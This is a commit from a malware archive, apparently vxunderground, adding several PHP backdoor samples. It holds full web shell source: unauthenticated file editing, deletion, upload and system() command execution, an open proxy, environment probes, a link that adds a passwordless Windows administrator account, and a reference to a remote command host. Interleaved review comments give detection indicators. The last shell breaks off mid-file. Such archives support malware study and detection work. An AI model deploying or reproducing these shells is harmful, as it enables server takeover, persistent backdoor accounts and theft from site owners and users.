Add files via upload

vxunderground 2020-10-09 22:05:41 -05:00 committed by GitHub
parent 27f87bc75b
commit 23c136b0eb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
96 changed files with 23882 additions and 0 deletions


181
PHP/Backdoor.PHP.Agent.bg Normal file

@ -0,0 +1,181 @@
<?
/*
Backdoor php v0.1
Coded By Charlichaplin
charlichaplin@gmail.com
Join me: irc.fr.worldnet.net #s-c
Greetz: My dog :)
*/
class backdoor {
var $pwd;
var $rep;
var $list = array();
var $file;
var $edit;
var $fichier;
var $del;
var $shell;
var $proxy;
function dir() {
if(!empty($this->rep)) {
$dir = opendir($this->rep);
} else {
$dir = opendir($this->pwd);
}
while($f = readdir($dir)) {
if ($f !="." && $f != "..") {
$this->list[] = $f;
}
}
}
function view() {
$this->file = htmlentities(highlight_file($this->file));
}
function edit() {
if(!is_writable($this->edit)) {
echo "Ecriture impossible sur le fichier";
} elseif(!file_exists($this->edit)) {
echo "Le fichier n'existe pas ";
} elseif(!$this->fichier) {
$fp = fopen($this->edit,"r");
$a = "";
while(!feof($fp)) {
$a .= fgets($fp,1024);
}
echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$this->edit."\"><textarea name=\"fichier\" cols=\"50\" rows=\"20\">".htmlentities($a)."</textarea><input name=\"Submit\" type=\"submit\"></form>";
} else {
$fp = fopen($this->edit,"w+");
fwrite($fp, $this->fichier);
fclose($fp);
echo "Le fichier a été modifié";
}
}
function del() {
if(is_file($this->del)) {
if(unlink($this->del)) {
echo "Fichier supprimé";
} else {
echo "Vous n'avez pas les droits pour supprimer ce fichier";
}
} else {
echo $this->del." n'est pas un fichier";
}
}
function shell() {
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."\"><input name=\"shell\" type=\"text\"><input type=\"submit\" name=\"Shell\"></form><br>";
system($this->shell);
}
function proxy($host,$page) {
$fp = fsockopen($host,80);
if (!$fp) {
echo "impossible d'etablir un connection avec l'host";
} else {
$header = "GET ".$page." HTTP/1.1\r\n";
$header .= "Host: ".$host."\r\n";
$header .= "Connection: close\r\n\r\n";
fputs($fp,$header);
while (!feof($fp)) {
$line = fgets($fp,1024);
echo $line;
}
fclose($fp);
}
}
function ccopy($cfichier,$cdestination) {
if(!empty($cfichier) && !empty($cdestination)) {
copy($cfichier, $cdestination);
echo "Le fichier a été copié";
} else {
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?copy=1\">Source: <input type=\"text\" name=\"cfichier\"><br>Destination: <input type=\"text\" name=\"cdestination\"><input type=\"submit\" title=\"Submit\"></form>";
}
}
}
if(!empty($_REQUEST['rep'])) {
$rep = $_REQUEST['rep']."/";
}
$pwd = $_SERVER['SCRIPT_FILENAME'];
$pwd2 = explode("/",$pwd);
$file = $_REQUEST['file'];
$edit = $_REQUEST['edit'];
$fichier = $_POST['fichier'];
$del = $_REQUEST['del'];
$shell = $_REQUEST['shell'];
$proxy = $_REQUEST['proxy'];
$copy = $_REQUEST['copy'];
$cfichier = $_POST['cfichier'];
$cdestination = $_POST['cdestination'];
$n = count($pwd2);
$n = $n - 1;
$pwd = "";
for ($i = 0;$i != $n;$i = $i+1) {
$pwd .= "/".$pwd2[$i];
}
if($proxy) {
$host2 = explode("/",$proxy);
$n = count($host2);
$host = $host2[2];
$page = "";
for ($i = 3;$i != $n;$i = $i+1) {
$page .= "/".$host2[$i];
}
echo $page;
}
echo "<HTML><HEAD><TITLE>Index of ".$pwd."</TITLE>";
$backdoor = new backdoor();
$backdoor->pwd = $pwd;
$backdoor->rep = $rep;
$backdoor->file = $file;
$backdoor->edit = $edit;
$backdoor->fichier = $fichier;
$backdoor->del = $del;
$backdoor->shell = $shell;
$backdoor->proxy = $proxy;
echo "<TABLE><TR><TD bgcolor=\"#ffffff\" class=\"title\"><FONT size=\"+3\" face=\"Helvetica,Arial,sans-serif\"><B>Index of ".$backdoor->pwd."</B></FONT>";
$backdoor->dir();
echo "</TD></TR></TABLE><PRE>";
echo "<a href=\"".$_SERVER['PHP_SELF']."?shell=id\">Executer un shell</a> ";
echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy=http://www.cnil.fr/index.php?id=123\">Utiliser le serveur comme proxy</a> ";
echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <br>";
echo "<IMG border=\"0\" src=\"/icons/blank.gif\" ALT=\" \"> <A HREF=\"\">Name</A> <A HREF=\"\">Last modified</A> <A HREF=\"\">Size</A> <A HREF=\"\">Description</A>";
echo "<HR noshade align=\"left\" width=\"80%\">";
if($file) {
$backdoor->view();
} elseif($edit) {
$backdoor->edit();
} elseif($del) {
$backdoor->del();
} elseif($shell) {
$backdoor->shell();
}elseif($proxy) {
$backdoor->proxy($host,$page);
}elseif($copy == 1) {
$backdoor->ccopy($cfichier,$cdestination);
} else {
echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."../")."\">Parent Directory</A> ".date("r",realpath($rep."../"))." - <br>";
foreach ($backdoor->list as $key => $value) {
if(is_dir($rep.$value)) {
echo "[DIR]<A HREF=\"".$_SERVER['PHP_SELF']."?rep=".$rep.$value."\">".$value."/</A> ".date("r",filemtime($rep.$value))." - <br>";
} else {
echo "[FILE]<A HREF=\"".$_SERVER['PHP_SELF']."?file=".$rep.$value."\">".$value."</A> <a href=\"".$_SERVER['PHP_SELF']."?edit=".$rep.$value."\">(edit)</a> <a href=\"".$_SERVER['PHP_SELF']."?del=".$rep.$value."\">(del)</a> ".date("r",filemtime($rep.$value))." 1k <br>";
}
}
}
echo "</PRE><HR noshade align=\"left\" width=\"80%\">";
echo "<center><b>Coded By Charlichaplin</b></center>";
echo "</BODY></HTML>";
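Review bot: The specimen is added with no analysis record, and the dispatch chain at the end of the file (`if($file) … elseif($shell) …`) shows no authentication before any action, which is the first thing a triage entry should state. An accompanying index entry could read: `Backdoor.PHP.Agent.bg: unauthenticated PHP file manager; request parameter "shell" is passed to system(), POST "fichier" is written to the path in "edit", "del" is passed to unlink(), "proxy" drives an fsockopen() GET on port 80`. The page also titles itself `Index of <path>` and prints a directory table, so it resembles a server-generated listing; web logs showing `shell=`, `proxy=`, `edit=` or `del=` parameters on a page with that title are the matching hunt. Keep the description outside the file so the sample's hash is unchanged.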

73
PHP/Backdoor.PHP.Agent.bh Normal file

@ -0,0 +1,73 @@
<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
$UNAME = @php_uname();
echo "NAME:$UNAME<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
exit;
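Review bot: This file and the next two sections (`Backdoor.PHP.Agent.bi`, `Backdoor.PHP.Agent.bj`) are undocumented near-duplicates: all three echo `Mic22`, `PHP_OS`, `php_uname()`, free disk space and the output of a fixed `id` command, and differ only in the order and labels of the echo lines and in ending with `exit;` or `?>`. None of them reads request input, so they look like one-shot environment probes rather than interactive shells; how they are delivered is not shown on this page. A shared index note such as `Agent.bh/.bi/.bj: Mic22 probe; prints OS, uname, free space and id output; ex() tries exec, shell_exec, system, passthru, popen in that order` would record this once, with the literal `Mic22<br>` marker as the stable indicator for response-body or file-content matching.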

72
PHP/Backdoor.PHP.Agent.bi Normal file

@ -0,0 +1,72 @@
<?
$dir = @getcwd();
echo "Mic22<br>";
$ker = @php_uname();
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
exit;

59
PHP/Backdoor.PHP.Agent.bj Normal file

@ -0,0 +1,59 @@
<?
$dir = @getcwd();
$ker = @php_uname();
echo "Mic22<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
?>

50
PHP/Backdoor.PHP.Agent.bk Normal file

@ -0,0 +1,50 @@
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;}
else{
$contrs=1;
}}
if($contrs == 0){
echo("FEELCOMZ"."SAFEOFF");
}else{
echo("FEELCOMZ"."SAFEON");
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
?>
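Review bot: The result markers are assembled by concatenation (`echo("FEELCOMZ"."SAFEOFF")`), which is undocumented and matters for detection: a rule looking for the joined string `FEELCOMZSAFEOFF` or `FEELCOMZSAFEON` will match the HTTP response but not the file on disk, so file signatures should key on `FEELCOMZ` alone. The probe also calls `ini_restore("safe_mode")` and `ini_restore("open_basedir")` before re-running `ex("id")` / `ex("net start")`, so its output states whether command execution works before or after those two settings are restored. `eregi()` was removed in PHP 7.0, so the sample as written only runs to completion on PHP 5.x hosts. An index entry recording these three facts would make the file usable for rule writing.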

592
PHP/Backdoor.PHP.Agent.bl Normal file

@ -0,0 +1,592 @@
<html>
<head>
<meta http-equiv="Content-Language" content="pt-br">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="AoD">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>***BY PETERSON THE GREATEST CMD***</title>
<style type="text/css">
A:link {text-decoration:none}
A:visited {text-decoration:none}
A:hover {text-decoration:underline}
A:active {text-decoration:underline}
body,td {
font-family: verdana;
font-size: 8pt;
background-color: #FFCC00;
}
a{
color: #0000FF;
text-decoration: none;
}
a:hover {
color: #FF0000;
text-decoration: underline;
}
</style>
</head>
<body >
<center><h2> --== by MS flood_ ==-- </h2></center>
<?php
@set_time_limit(0);
$string = $_SERVER['QUERY_STRING'];
$mhost = 'http://nodan.110mb.com/cmds.txt?';
$host_all = explode("$mhost", $string);
$s1 = $host_all[0];
$fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;
$OS = @PHP_OS;
$IpServer = '127.0.0.1';
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
else { $SafeMode = "<i>$SafeMode</i>"; }
$btname = '';
$bt = '';
$dc = '';
$newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup
&quot;Administrators&quot; /add Admin;net localgroup &quot;Users&quot; /del Admin';
$bn = '';
// Java Script
echo "<script type=\"text/javascript\">";
echo "function ChMod(chdir, file) {";
echo "var o = prompt('Chmod: - Contoh: 0777', '');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file +
'&chmod=' + o + \"\";";
echo "}";
echo "}";
echo "function Rename(chdir, file, mode) {";
echo "if (mode == 'edit') {";
echo "var o = prompt('Ganti Nama File '+ file + ' menjadi:', '');";
echo "}";
echo "else {";
echo "var o = prompt('Ganti Nama Folder '+ file + ' menjadi:', '');";
echo "}";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file +
'&newname=' + o + '&mode=' + mode +\"\";";
echo "}";
echo "}";
echo "function Copy(chdir, file) {";
echo "var o = prompt('Copied for:', '/tmp/' + file);";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file +
'&fcopy=' + o + \"\";";
echo "}";
echo "}";
echo "function Mkdir(chdir) {";
echo "var o = prompt('Nama Folder?', 'Folder_Baru');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o +
\"\";";
echo "}";
echo "}";
echo "function Newfile(chdir) {";
echo "var o = prompt('Nama File?', 'File_Baru.txt');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o +
\"\";";
echo "}";
echo "}";
echo "</script>";
// End JavaScript
/* Functions */
function cmd($CMDs) {
$CMD[1] = '';
exec($CMDs, $CMD[1]);
if (empty($CMD[1])) {
$CMD[1] = shell_exec($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = passthru($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = system($CMDs);
}
elseif (empty($CMD[1])) {
$handle = popen($CMDs, 'r');
while(!feof($handle)) {
$CMD[1][] .= fgets($handle);
}
pclose($handle);
}
return $CMD[1];
}
if (@$_GET['chdir']) {
$chdir = $_GET['chdir'];
} else {
$chdir = getcwd()."/";
}
if (@chdir("$chdir")) {
$msg = "<font color=\"#008000\"> Pintu Masuk ke Direktori, OK!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Gagal masukkan ke folder!</font>";
$chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}
$chdir = str_replace(chr(92), chr(47), $chdir);
if (@$_GET['action'] == 'upload') {
$uploaddir = $chdir;
$uploadfile = $uploaddir. $_FILES['userfile']['name'];
if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .
$_FILES['userfile']['name'])) {
$msg = "<font color=\"#008000\"><font
color=\"#000080\">{$_FILES['userfile']['name']}</font>, Upload File Berjaya.
</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Upload File Gagal.</font>";
}
}
elseif (@$_GET['action'] == 'mkdir') {
$newdir = $_GET['newdir'];
if (@mkdir("$chdir"."$newdir")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newdir}</font>, folder
berhasil dibuat. </font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Pembuatan folder gagal.</font>";
}
}
elseif (@$_GET['action'] == 'newfile') {
$newfile = $_GET['newfile'];
if (@touch("$chdir"."$newfile")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newfile}</font>, berhasil
dibuat! </font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Tak Boleh Buat File!</font>";
}
}
elseif (@$_GET['action'] == 'del') {
$file = $_GET['file']; $type = $_GET['type'];
if ($type == 'file') {
if (@unlink("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, Berhasil
menghapus arsip (file)!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Gagal menghapuskan File (file)!</font>";
}
} elseif ($type == 'dir') {
if (@rmdir("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, Berhasil
menghapus folder!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Gagal menghapuskan folder!</font>";
}
}
}
elseif (@$_GET['action'] == 'chmod') {
$file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
if (@chmod ("$file", $chmod)) {
$msg = "<font color=\"#008000\">Chmod dari</font> <font
color=\"#000080\">{$_GET['file']}</font> <font color=\"#008000\">berubah menjadi</font>
<font color=\"#000080\">$chmod</font> <font color=\"#008000\">: Sukses!</font>";
} else {
$msg = '<font color=\"#FF0000\">Error: Gagal mengubah chmod.</font>';
}
}
elseif (@$_GET['action'] == 'rename') {
$file = $_GET['file']; $newname = $_GET['newname'];
if (@rename("$chdir"."$file", "$chdir"."$newname")) {
$msg = "<font color=\"#008000\">Archive</font> <font color=\"#000080\">{$file}</font>
<font color=\"#008000\">named for</font> <font color=\"#000080\">{$newname}</font> <font
color=\"#008000\">successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Gagal menukar File.</font>";
}
}
elseif (@$_GET['action'] == 'copy') {
$file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
if (@copy("$file", "$copy")) {
$msg = "<font color=\"#000080\">{$file}</font>, <font color=\"#008000\">disalin
menjadi</font> <font color=\"#000080\">{$copy}</font> <font color=\"#008000\">
Berhasil!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Gagal menyalin </font> <font
color=\"#000000\">{$file}</font> <font color=\"#FF0000\">menjadi</font> <font
color=\"#000000\">{$copy}</font></font>";
}
}
/* Parte Atualiza 02:48 12/2/2006 */
elseif (@$_GET['action'] == 'cmd') {
if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
$cmd = stripslashes(trim($cmd));
$result_arr = cmd($cmd);
$afim = count($result_arr); $acom = 0; $msg = '';
$msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida
Console';font-size: 12px;margin 2\">Hasil : <b>".$cmd."</b></p>";
if ($result_arr) {
while ($acom <= $afim) {
$msg .= "<p style=\"color: #008000;text-align: left;font-family:
'Lucida Console';font-size: 12px;margin 2\"> ".@$result_arr[$acom]."</p>";
$acom++;
}
}
else {
$msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida
Console';font-size: 12px;margin 2\">Error: Gagal Menjalankan perintah.</p>";
}
}
elseif (@$_GET['action'] == 'safemode') {
if (@!extension_loaded('shmop')) {
echo "Loading... module</br>";
if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
@dl('php_shmop.dll');
} else {
@dl('shmop.so');
}
}
if (@extension_loaded('shmop')) {
echo "Module: <b>shmop</b> loaded!</br>";
$shm_id = @shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
$data="\x00";
$offset=-3842685;
$shm_bytes_written = @shmop_write($shm_id, $data, $offset);
if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of
data\n"; }
if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
echo passthru("id");
shmop_close($shm_id);
} else { echo "Module: <b>shmop</b> tidak dimuat!</br>"; }
}
elseif (@$_GET['action'] == 'zipen') {
$file = $_GET['file'];
$zip = @zip_open("$chdir"."$file");
$msg = '';
if ($zip) {
while ($zip_entry = zip_read($zip)) {
$msg .= "Name: " . zip_entry_name($zip_entry) . "\n";
$msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\n";
$msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\n";
$msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n";
if (zip_entry_open($zip, $zip_entry, "r")) {
echo "File Contents:\n";
$buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
echo "$buf\n";
zip_entry_close($zip_entry);
}
echo "\n";
}
zip_close($zip);
}
}
elseif (@$_GET['action'] == 'edit') {
$file = $_GET['file'];
$conteudo = '';
$filename = "$chdir"."$file";
$conteudo = @file_get_contents($filename);
$conteudo = htmlspecialchars($conteudo);
$back = $_SERVER['HTTP_REFERER'];
echo "<p align=\"center\">Editing {$file} ...</p>";
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:
collapse\" width=\"100%\" id=\"editacao\">";
echo "<tr>";
echo "<td width=\"100%\">";
echo "<form method=\"POST\"
action=\"{$fstring}&amp;action=save&amp;chdir={$chdir}&amp;file={$file}\">";
echo "<!--webbot bot=\"SaveResults\" u-file=\"_private/form_results.csv\"
s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><p align=\"center\">";
print "<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana;
font-size: 8pt; border: 1px solid #000000\">{$conteudo}</textarea></p>";
echo "<p align=\"center\">";
echo "<input type=\"submit\" value=\"Simpan\" name=\"B2\" style=\" border: 1px solid
#000000\"> ";
echo "<input type=\"button\" value=\"Tutup\"
Onclick=\"javascript:window.location='{$fstring}&amp;chdir={$chdir}'\" name=\"B1\" style=\"
border: 1px solid #000000\"> ";
echo "</form>";
echo "</td>";
echo "</tr>";
echo "</table>";
}
elseif (@$_GET['action'] == 'save') {
$filename = "$chdir".$_GET['file'];
$somecontent = $_POST['S1'];
$somecontent = stripslashes(trim($somecontent));
if (is_writable($filename)) {
@$handle = fopen ($filename, "w");
@$fw = fwrite($handle, $somecontent);
@fclose($handle);
if ($handle && $fw) {
$msg = "<font color=\"#000080\">{$_GET['file']}</font>, <font
color=\"#008000\">berhasil diedit!</font>";
}
} else {
$msg = "<font color=\"#000000\">{$_GET['file']},</font> <font color=\"#FF0000\">tidak
bisa ditulisi!</font>";
}
}
// Informaçs
$cmdget = '';
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
$cmdget = htmlspecialchars($cmdget);
function asdads() {
$asdads = '';
if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
return $asdads;
}
echo "<form method=\"POST\" name=\"cmd\"
action=\"{$fstring}&amp;action=cmd&amp;chdir=$chdir\">";
echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
echo "<legend>Informasi</legend>";
echo "<br><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:
collapse; font-family: Verdana; font-size: 10px\" width=\"100%\">";
echo "<tr>";
echo "<td width=\"8%\">";
echo " <b>Sistem </b> </td> ";
echo "<td width=\"92%\">: {$OS}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo " <b>Nama </b></td> ";
echo "<td width=\"92%\">: {$UNAME}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo " <b>PHP </b></td> ";
echo "<td width=\"92%\">: {$PHPv}, <b> Safe Mode :</b> {$SafeMode}</td>";
echo "</tr>";
if (strtoupper(substr($OS, 0,3) != 'WIN')) {
$Methods = asdads();
if ($Methods == '') { $Methods = "???"; }
echo "<tr>";
echo "<td width=\"8%\">";
echo "<b>Methods </b></td> ";
echo "<td width=\"92%\">: {$Methods}</td>";
echo "</tr>";
}
echo "<tr>";
echo "<td width=\"8%\">";
echo " <b>IP </b></td> ";
echo "<td width=\"92%\">: {$IpServer}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo " <b>Perintah </b></td> ";
echo "<td width=\"92%\">: <input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\"
style=\" font-size: 8 pt; border: 1px solid #000000\"> <input type=\"submit\"
name=\"action\" value=\"Kirim\" style=\" font-size: 8 pt; border: 1px solid
#000000\"></td>";
echo "</tr>";
echo "</table><br>";
echo "</fieldset></form>";
// Dir
echo "<form method=\"POST\" action=\"{$fstring}&amp;action=upload&amp;chdir=$chdir\"
enctype=\"multipart/form-data\">";
echo "<!--webbot bot=\"FileUpload\" u-file=\"_private/form_results.csv\"
s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><fieldset style=\"border: 1px solid
#000000; padding: 2\">";
if (is_writable("$chdir")) {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\"
onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd=$newuser\">Remote
Access</a></legend>";
} else {
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\"
onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=yes\">Kembali</a></legend
>";
}
}
else {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\"
onclick=\"Mkdir('{$chdir}');\">Foldr Baru</a> | <a href=\"#[New File]\"
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd={$newuser}\">Remote
Access</a></legend>";
} else {
echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\"
onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=no\">Kembali</a></legend>
";
}
}
if (@!$handle = opendir("$chdir")) {
echo " Gue gak bisa masuk folder, <a href=\"{$fstring}\">Klik sini!</a> untuk Kembali ke folder ori!</br>";
}
else {
echo " <table border=\"0\" cellpadding=\"5\" cellspacing=\"0\" width=\"100%\">";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\"> Upload:";
echo " <input type=\"file\" name=\"userfile\" size=\"65\" style=\" border-style:
solid; border-width: 1\">";
echo " <input type=\"submit\" value=\"Kirim\" name=\"B1\" style=\" border: 1px solid
#000000\"></td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\"> </td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\">";
if (@!$msg) {
echo " <p align=\"left\">Messages</td>";
} else {
echo " <p align=\"left\">$msg</td>";
}
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\"> </td>";
echo " </tr></table> ";
echo " <table border=\"1\" cellpadding=\"2\" cellspacing=\"0\" width=\"100%\">";
echo " <tr bgcolor=\"#FF6600\" align=\"center\"> ";
echo " <td > Permision</td>";
echo " <td > Nama File </td>";
echo " <td > Kapasiti </td>";
echo " <td > Perintah</td>";
echo " </tr>";
$colorn = 0;
while (false !== ($file = readdir($handle))) {
if ($file != '.') {
if ($colorn == 0) {
$color = "style=\"background-color: #FF9900\"";
}
elseif ($colorn == 1) {
$color = "style=\"background-color: #FFCC33\"";
}
if (@is_dir("$chdir"."$file")) {
$file = $file.'/';
$mode = 'chdir';
} else {
$mode = 'edit';
}
if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
$chdir .= '/';
}
if ($file == '../') {
$lenpath = strlen($chdir); $baras = 0;
